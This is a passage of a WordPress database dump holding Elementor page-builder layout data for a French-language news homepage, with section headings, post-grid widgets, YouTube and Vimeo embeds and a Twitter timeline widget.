cture\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2383,765,'_elementor_version','0.4'),(2384,765,'_elementor_css','a:3:{s:4:\"time\";i:1509371505;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2386,766,'_elementor_edit_mode','builder'),(2387,766,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"250\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_wi